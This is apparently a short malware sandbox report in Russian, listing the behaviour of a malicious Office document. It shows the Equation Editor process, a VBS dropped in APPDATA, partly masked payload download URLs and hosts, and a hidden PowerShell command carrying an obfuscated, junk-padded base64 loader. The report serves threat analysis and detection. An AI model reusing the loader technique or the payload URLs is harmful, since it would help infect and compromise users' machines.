Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\mekissedbutterburnwithstrong.vBS"
- %APPDATA%\mekissedbutterburnwithstrong.vbs
- 'ji##rl.com':443
- '19#.#10.150.33':80
- 'ia#####4.us.archive.org':443
- http://19#.#10.150.33/143/uc/seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn.doc
- http://19#.#10.150.33/143/mekissedbutterburnwithstronglips.tIF
- 'ji##rl.com':443
- 'ia#####4.us.archive.org':443
- DNS ASK ji##rl.com
- DNS ASK ia#####4.us.archive.org
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J﷽ ★ ㎼ ㈸ ㎩Bp﷽ ★ ㎼ ㈸ ㎩G0﷽ ★ ㎼ ㈸ ㎩YQBn﷽ ★ ㎼ ㈸ ㎩GU﷽ ★ ㎼ ㈸ ㎩VQBy﷽ ★ ㎼ ㈸ ㎩Gw﷽ ★ ㎼ ㈸ ㎩I﷽ ★ ㎼ ㈸ ㎩﷽ ★ ㎼ ㈸ ㎩9﷽ ★ ㎼ ㈸ ㎩C﷽ ★ ㎼ ㈸ ㎩﷽ ★ ㎼ ㈸ ㎩JwBo﷽ ★ ㎼ ㈸ ㎩HQ﷽ ★ ㎼ ㈸ ㎩d﷽ ★ ㎼ ㈸ ㎩Bw﷽ ★ ㎼ ㈸ ㎩... (со скрытым окном)